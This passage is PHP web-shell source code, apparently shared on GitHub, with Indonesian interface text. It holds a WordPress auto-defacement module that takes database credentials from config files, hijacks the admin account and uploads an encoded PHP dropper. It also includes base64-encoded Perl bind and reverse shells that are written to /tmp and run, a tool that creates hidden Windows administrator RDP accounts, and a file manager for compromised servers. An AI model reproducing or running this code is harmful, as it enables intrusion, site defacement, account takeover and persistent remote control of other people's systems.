$ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); | |
curl_setopt($ch, CURLOPT_POST, 1); | |
curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); | |
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); | |
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); | |
curl_setopt($ch, CURLOPT_COOKIESESSION, true); | |
$data3 = curl_exec($ch); | |
curl_close($ch); | |
$y = date("Y"); | |
$m = date("m"); | |
$namafile = "id.php"; | |
$fpi = fopen($namafile,"w"); | |
fputs($fpi,$script); | |
$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); | |
curl_setopt($ch6, CURLOPT_POST, true); | |
curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile")); | |
curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); | |
curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt'); | |
curl_setopt($ch6, CURLOPT_COOKIESESSION, true); | |
$postResult = curl_exec($ch6); | |
curl_close($ch6); | |
$as = "$target/k.php"; | |
$bs = anucurl($as); | |
if(preg_match("#$script#is", $bs)) { | |
echo "[+] <font color='lime'>berhasil mepes...</font><br>"; | |
echo "[+] <a href='$as' target='_blank'>$as</a><br><br>"; | |
} else { | |
echo "[-] <font color='red'>gagal mepes...</font><br>"; | |
echo "[!!] coba aja manual: <br>"; | |
echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>"; | |
echo "[+] username: <font color=lime>$user</font><br>"; | |
echo "[+] password: <font color=lime>$pass</font><br><br>"; | |
} | |
mysql_close($conn); | |
} | |
} | |
} | |
} else { | |
echo "<center><h1>WordPress Auto Deface</h1> | |
<form method='post'> | |
<input type='text' name='link_config' size='50' height='10' value='$dir'><br> | |
<input type='text' name='script' height='10' size='50' placeholder='Hacked by Black-TeamX' required><br> | |
<input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'> | |
</form> | |
<br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span> | |
</center>"; | |
} | |
} elseif($_GET['do'] == 'auto_dwp2') { | |
if($_POST['auto_deface_wp']) { | |
function anucurl($sites) { | |
$ch = curl_init($sites); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); | |
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); | |
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); | |
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); | |
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); | |
curl_setopt($ch, CURLOPT_COOKIESESSION,true); | |
$data = curl_exec($ch); | |
curl_close($ch); | |
return $data; | |
} | |
function lohgin($cek, $web, $userr, $pass, $wp_submit) { | |
$post = array( | |
"log" => "$userr", | |
"pwd" => "$pass", | |
"rememberme" => "forever", | |
"wp-submit" => "$wp_submit", | |
"redirect_to" => "$web", | |
"testcookie" => "1", | |
); | |
$ch = curl_init($cek); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); | |
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); | |
curl_setopt($ch, CURLOPT_POST, 1); | |
curl_setopt($ch, CURLOPT_POSTFIELDS, $post); | |
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); | |
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); | |
curl_setopt($ch, CURLOPT_COOKIESESSION, true); | |
$data = curl_exec($ch); | |
curl_close($ch); | |
return $data; | |
} | |
$link = explode("\r\n", $_POST['link']); | |
$script = htmlspecialchars($_POST['script']); | |
$user = "Xsol"; | |
$pass = "Xsol"; | |
$passx = md5($pass); | |
foreach($link as $dir_config) { | |
$config = anucurl($dir_config); | |
$dbhost = ambilkata($config,"DB_HOST', '","'"); | |
$dbuser = ambilkata($config,"DB_USER', '","'"); | |
$dbpass = ambilkata($config,"DB_PASSWORD', '","'"); | |
$dbname = ambilkata($config,"DB_NAME', '","'"); | |
$dbprefix = ambilkata($config,"table_prefix = '","'"); | |
$prefix = $dbprefix."users"; | |
$option = $dbprefix."options"; | |
$conn = mysql_connect($dbhost,$dbuser,$dbpass); | |
$db = mysql_select_db($dbname); | |
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); | |
$result = mysql_fetch_array($q); | |
$id = $result[ID]; | |
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); | |
$result2 = mysql_fetch_array($q2); | |
$target = $result2[option_value]; | |
if($target == '') { | |
echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>"; | |
} else { | |
echo "[+] $target <br>"; | |
} | |
$update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); | |
if(!$conn OR !$db OR !$update) { | |
echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>"; | |
mysql_close($conn); | |
} else { | |
$site = "$target/wp-login.php"; | |
$site2 = "$target/wp-admin/theme-install.php?upload"; | |
$b1 = anucurl($site2); | |
$wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />"); | |
$b = lohgin($site, $site2, $user, $pass, $wp_sub); | |
$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />"); | |
$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); | |
$www = "m.php"; | |
$fp5 = fopen($www,"w"); | |
fputs($fp5,$upload3); | |
$post2 = array( | |
"_wpnonce" => "$anu2", | |
"_wp_http_referer" => "/wp-admin/theme-install.php?upload", | |
"themezip" => "@$www", | |
"install-theme-submit" => "Install Now", | |
); | |
$ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); | |
curl_setopt($ch, CURLOPT_POST, 1); | |
curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); | |
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); | |
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); | |
curl_setopt($ch, CURLOPT_COOKIESESSION, true); | |
$data3 = curl_exec($ch); | |
curl_close($ch); | |
$y = date("Y"); | |
$m = date("m"); | |
$namafile = "id.php"; | |
$fpi = fopen($namafile,"w"); | |
fputs($fpi,$script); | |
$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); | |
curl_setopt($ch6, CURLOPT_POST, true); | |
curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile")); | |
curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); | |
curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt'); | |
curl_setopt($ch6, CURLOPT_COOKIESESSION,true); | |
$postResult = curl_exec($ch6); | |
curl_close($ch6); | |
$as = "$target/k.php"; | |
$bs = anucurl($as); | |
if(preg_match("#$script#is", $bs)) { | |
echo "[+] <font color='lime'>berhasil mepes...</font><br>"; | |
echo "[+] <a href='$as' target='_blank'>$as</a><br><br>"; | |
} else { | |
echo "[-] <font color='red'>gagal mepes...</font><br>"; | |
echo "[!!] coba aja manual: <br>"; | |
echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>"; | |
echo "[+] username: <font color=lime>$user</font><br>"; | |
echo "[+] password: <font color=lime>$pass</font><br><br>"; | |
} | |
mysql_close($conn); | |
} | |
} | |
} else { | |
echo "<center><h1>WordPress Auto Deface V.2</h1> | |
<form method='post'> | |
Link Config: <br> | |
<textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br> | |
<input type='text' name='script' height='10' size='50' placeholder='Hacked by Black-TeamX' required><br> | |
<input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'> | |
</form></center>"; | |
} | |
} elseif($_GET['do'] == 'network') { | |
echo "<form method='post'> | |
<u>Bind Port:</u> <br> | |
PORT: <input type='text' placeholder='port' name='port_bind' value='6969'> | |
<input type='submit' name='sub_bp' value='>>'> | |
</form> | |
<form method='post'> | |
<u>Back Connect:</u> <br> | |
Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'> | |
PORT: <input type='text' placeholder='port' name='port_bc' value='6969'> | |
<input type='submit' name='sub_bc' value='>>'> | |
</form>"; | |
$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; | |
if(isset($_POST['sub_bp'])) { | |
$f_bp = fopen("/tmp/bp.pl", "w"); | |
fwrite($f_bp, base64_decode($bind_port_p)); | |
fclose($f_bp); | |
$port = $_POST['port_bind']; | |
$out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &"); | |
sleep(1); | |
echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>"; | |
unlink("/tmp/bp.pl"); | |
} | |
$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; | |
if(isset($_POST['sub_bc'])) { | |
$f_bc = fopen("/tmp/bc.pl", "w"); | |
fwrite($f_bc, base64_decode($bind_connect_p)); | |
fclose($f_bc); | |
$ipbc = $_POST['ip_bc']; | |
$port = $_POST['port_bc']; | |
$out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &"); | |
sleep(1); | |
echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>"; | |
unlink("/tmp/bc.pl"); | |
} | |
} elseif($_GET['do'] == 'krdp_shell') { | |
if(strtolower(substr(PHP_OS, 0, 3)) === 'win') { | |
if($_POST['create']) { | |
$user = htmlspecialchars($_POST['user']); | |
$pass = htmlspecialchars($_POST['pass']); | |
if(preg_match("/$user/", exe("net user"))) { | |
echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>"; | |
} else { | |
$add_user = exe("net user $user $pass /add"); | |
$add_groups1 = exe("net localgroup Administrators $user /add"); | |
$add_groups2 = exe("net localgroup Administrator $user /add"); | |
$add_groups3 = exe("net localgroup Administrateur $user /add"); | |
echo "[ RDP ACCOUNT INFO ]<br> | |
------------------------------<br> | |
IP: <font color=lime>".$ip."</font><br> | |
Username: <font color=lime>$user</font><br> | |
Password: <font color=lime>$pass</font><br> | |
------------------------------<br><br> | |
[ STATUS ]<br> | |
------------------------------<br> | |
"; | |
if($add_user) { | |
echo "[add user] -> <font color='lime'>Berhasil</font><br>"; | |
} else { | |
echo "[add user] -> <font color='red'>Gagal</font><br>"; | |
} | |
if($add_groups1) { | |
echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>"; | |
} elseif($add_groups2) { | |
echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>"; | |
} elseif($add_groups3) { | |
echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>"; | |
} else { | |
echo "[add localgroup] -> <font color='red'>Gagal</font><br>"; | |
} | |
echo "------------------------------<br>"; | |
} | |
} elseif($_POST['s_opsi']) { | |
$user = htmlspecialchars($_POST['r_user']); | |
if($_POST['opsi'] == '1') { | |
$cek = exe("net user $user"); | |
echo "Checking username <font color=lime>$user</font> ....... "; | |
if(preg_match("/$user/", $cek)) { | |
echo "[ <font color=lime>Sudah ada</font> ]<br> | |
------------------------------<br><br> | |
<pre>$cek</pre>"; | |
} else { | |
echo "[ <font color=red>belum ada</font> ]"; | |
} | |
} elseif($_POST['opsi'] == '2') { | |
$cek = exe("net user $user Xsol"); | |
if(preg_match("/$user/", exe("net user"))) { | |
echo "[change password: <font color=lime>Xsol</font>] -> "; | |
if($cek) { | |
echo "<font color=lime>Berhasil</font>"; | |
} else { | |
echo "<font color=red>Gagal</font>"; | |
} | |
} else { | |
echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>"; | |
} | |
} elseif($_POST['opsi'] == '3') { | |
$cek = exe("net user $user /DELETE"); | |
if(preg_match("/$user/", exe("net user"))) { | |
echo "[remove user: <font color=lime>$user</font>] -> "; | |
if($cek) { | |
echo "<font color=lime>Berhasil</font>"; | |
} else { | |
echo "<font color=red>Gagal</font>"; | |
} | |
} else { | |
echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>"; | |
} | |
} else { | |
// | |
} | |
} else { | |
echo "-- Create RDP --<br> | |
<form method='post'> | |
<input type='text' name='user' placeholder='username' value='Xsol' required> | |
<input type='text' name='pass' placeholder='password' value='Xsol' required> | |
<input type='submit' name='create' value='>>'> | |
</form> | |
-- Option --<br> | |
<form method='post'> | |
<input type='text' name='r_user' placeholder='username' required> | |
<select name='opsi'> | |
<option value='1'>Cek Username</option> | |
<option value='2'>Ubah Password</option> | |
<option value='3'>Hapus Username</option> | |
</select> | |
<input type='submit' name='s_opsi' value='>>'> | |
</form> | |
"; | |
} | |
} else { | |
echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>"; | |
} | |
} elseif($_GET['act'] == 'newfile') { | |
if($_POST['new_save_file']) { | |
$newfile = htmlspecialchars($_POST['newfile']); | |
$fopen = fopen($newfile, "a+"); | |
if($fopen) { | |
$act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>"; | |
} else { | |
$act = "<font color=red>permission denied</font>"; | |
} | |
} | |
echo $act; | |
echo "<form method='post'> | |
Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'> | |
<input type='submit' name='new_save_file' value='Submit'> | |
</form>"; | |
} elseif($_GET['act'] == 'newfolder') { | |
if($_POST['new_save_folder']) { | |
$new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']); | |
if(!mkdir($new_folder)) { | |
$act = "<font color=red>permission denied</font>"; | |
} else { | |
$act = "<script>window.location='?dir=".$dir."';</script>"; | |
} | |
} | |
echo $act; | |
echo "<form method='post'> | |
Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'> | |
<input type='submit' name='new_save_folder' value='Submit'> | |
</form>"; | |
} elseif($_GET['act'] == 'rename_dir') { | |
if($_POST['dir_rename']) { | |
$dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename']).""); | |
if($dir_rename) { | |
$act = "<script>window.location='?dir=".dirname($dir)."';</script>"; | |
} else { | |
$act = "<font color=red>permission denied</font>"; | |
} | |
echo "".$act."<br>"; | |
} | |
echo "<form method='post'> | |
<input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'> | |
<input type='submit' name='dir_rename' value='rename'> | |
</form>"; | |
} elseif($_GET['act'] == 'delete_dir') { | |
if(is_dir($dir)) { | |
if(is_writable($dir)) { | |
@rmdir($dir); | |
@exe("rm -rf $dir"); | |
@exe("rmdir /s /q $dir"); | |
$act = "<script>window.location='?dir=".dirname($dir)."';</script>"; | |
} else { | |
$act = "<font color=red>could not remove ".basename($dir)."</font>"; | |
} | |
} | |
echo $act; | |
} elseif($_GET['act'] == 'edit') { | |
if($_POST['save']) { | |
$save = file_put_contents($_GET['file'], $_POST['src']); | |
if($save) { | |
$act = "<font color=lime>Saved!</font>"; | |
} else { | |
$act = "<font color=red>permission denied</font>"; | |
} | |
echo "".$act."<br>"; | |
} | |
echo "Filename: <font color=lime>".basename($_GET['file'])."</font><span> ~ Size : $size |</span> [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='$full/".basename($_GET['file'])."' target='_blank'>Open</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a style='color:red' href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>"; | |
echo "<form method='post'> | |
<input type='submit' value='Save' name='save' style='width: 375px;'> | |
<textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea> | |
</form>"; | |
} elseif($_GET['act'] == 'rename') { | |
if($_POST['do_rename']) { | |
$rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename']).""); | |
if($rename) { | |
$act = "<script>window.location='?dir=".$dir."';</script>"; | |
} else { | |
$act = "<font color=red>permission denied</font>"; | |
} | |
echo "".$act."<br>"; | |
} | |
echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='$full/$file'' target='_blank'>Open</a> ] [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>"; | |
echo "<form method='post'> | |
<input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'> | |
<input type='submit' name='do_rename' value='rename'> | |
</form>"; | |
} elseif($_GET['act'] == 'delete') { | |
$delete = unlink($_GET['file']); | |
if($delete) { | |
$act = "<script>window.location='?dir=".$dir."';</script>"; | |
} else { | |
$act = "<font color=red>permission denied</font>"; | |
} | |
echo $act; | |
} elseif($_GET['act'] == 'zip') { | |
$zipname = basename(dirname($_GET['file'])) . ".zip"; | |
$rootPath = realpath($dir); | |
$zip = new ZipArchive(); | |
$zip->open($zipname, ZipArchive::CREATE | ZipArchive::OVERWRITE); | |
$files = new RecursiveIteratorIterator( | |
new RecursiveDirectoryIterator($rootPath), | |
RecursiveIteratorIterator::LEAVES_ONLY | |
); | |
foreach ($files as $name => $file) | |
{ | |
if (!$file->isDir()) | |
{ | |
$filePath = $file->getRealPath(); | |
$relativePath = substr($filePath, strlen($rootPath) + 1); | |
$zip->addFile($filePath, $relativePath); | |
} | |
} | |
$zip->close(); | |
} else { | |
if(is_dir($dir) === true) { | |
if(!is_readable($dir)) { | |
echo "<font color=red>can't open directory. ( not readable )</font>"; | |
} else { | |
echo "<form method='GET' ><div class='FormFile'><input type='submit' name='zip' value='Zip'> | <input type='submit' name='chmoud' value='Chmoud'> | <input type='submit' name='delete' value='Delete'> | </div> | |
<table width='100%' class='table_home' border='0' cellpadding='3' cellspacing='1' align='center'> | |
<tr> | |
<th class='th_home'><center>Name</center></th> | |
<th class='th_home'><center>Type</center></th> | |
<th class='th_home'><center>Size</center></th> | |
<th class='th_home'><center>Last Modified</center></th> | |
<th class='th_home'><center>Owner/Group</center></th> | |
<th class='th_home'><center>Permission</center></th> | |
<th class='th_home'><center>Action</center></th> | |
</tr>"; | |
$scandir = scandir($dir); | |
foreach($scandir as $dirx) { | |
$dtype = filetype("$dir/$dirx"); | |
$dtime = date("F d Y g:i:s", filemtime("$dir/$dirx")); | |
if(function_exists('posix_getpwuid')) { | |
$downer = @posix_getpwuid(fileowner("$dir/$dirx")); | |
$downer = $downer['name']; | |
} else { | |
//$downer = $uid; | |
$downer = fileowner("$dir/$dirx"); | |
} | |
if(function_exists('posix_getgrgid')) { | |
$dgrp = @posix_getgrgid(filegroup("$dir/$dirx")); | |
$dgrp = $dgrp['name']; | |
} else { | |
$dgrp = filegroup("$dir/$dirx"); | |
} | |
if(!is_dir("$dir/$dirx")) continue; | |
if($dirx === '..') { | |
$href = "<a href='?dir=".dirname($dir)."'>$dirx</a>"; | |
} elseif($dirx === '.') { | |
$href = "<a href='?dir=$dir'>$dirx</a>"; | |
} else { | |
$href = "<a href='?dir=$dir/$dirx'>$dirx</a>"; | |
} | |
if($dirx === '.' || $dirx === '..') { | |
$act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>"; | |
} else { | |
$act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=zip&dir=$dir/$dirx'>Zip_it !</a> | <a style='color:red' href='?act=delete_dir&dir=$dir/$dirx'>delete</a>"; | |
} | |
echo "<tr>"; | |
echo "<td class='td_home'><input type='checkbox' name='CheckFile' value='$dir'>| <img src='https://www.shareicon.net/data/16x16/2015/12/08/197900_folder_256x256.png'>$href</td>"; | |
echo "<td class='td_home'><center>$dtype</center></td>"; | |
echo "<td class='td_home'><center>-</center></th></td>"; | |
echo "<td class='td_home'><center>$dtime</center></td>"; | |
echo "<td class='td_home'><center>$downer/$dgrp</center></td>"; | |
echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>"; | |
echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>"; | |
echo "</tr>"; | |
} | |
} | |
} else { | |
echo "<font color=red>can't open directory.</font>"; | |
} | |
foreach($scandir as $file) { | |
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); | |
$ftype = filetype("$dir/$file"); | |
$ftime = date("F d Y g:i:s", filemtime("$dir/$file")); | |
$size = filesize("$dir/$file")/1024; | |
$size = round($size,3); | |
if(function_exists('posix_getpwuid')) { | |
$fowner = @posix_getpwuid(fileowner("$dir/$file")); | |
$fowner = $fowner['name']; | |
} else { | |
//$downer = $uid; | |
$fowner = fileowner("$dir/$file"); | |
} | |
if(function_exists('posix_getgrgid')) { | |
$fgrp = @posix_getgrgid(filegroup("$dir/$file")); | |
$fgrp = $fgrp['name']; | |
} else { | |
$fgrp = filegroup("$dir/$file"); | |
} | |
if($size > 1024) { | |
$size = round($size/1024,2). 'MB'; | |
} else { | |
$size = $size. 'KB'; | |
} | |
if(!is_file("$dir/$file")) continue; | |
echo "<tr>"; | |
echo "<td class='td_home'><input type='checkbox' name='CheckFile' value='$dir/$file'></form>| <img src='https://i.imgur.com/A4cr8oR.png'><a href='?act=edit&dir=$dir&file=$dir/$file'>$file</a></td>"; | |
echo "<td class='td_home'><center>$ftype</center></td>"; | |
echo "<td class='td_home'><center>$size</center></td>"; | |
echo "<td class='td_home'><center>$ftime</center></td>"; | |
echo "<td class='td_home'><center>$fowner/$fgrp</center></td>"; | |
echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>"; | |
echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='$full/$file'' target='_blank'>Open</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a> | <a style='color:red' href='?act=delete&dir=$dir&file=$dir/$file'>delete</a></td>"; | |
echo "</tr>"; | |
} | |
echo "</table>"; | |
if(!is_readable($dir)) { | |
// | |
} else { | |
echo "<hr>"; | |
} | |
echo "<center>Copyright © ".date("Y")." - <a href='#' target='_blank'><font color=lime>Xsol-Familly</font></a></center>"; | |
} | |
} //diyal open file | |
?> | |
<script language="JavaScript"> | |
wside=(window.sidebar)?true:false;isNS=navigator.userAgent.toLowerCase().indexOf('netscape')>=0?true:false;function noerror(){return true};window.onerror = noerror;var isOff=false;</script> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment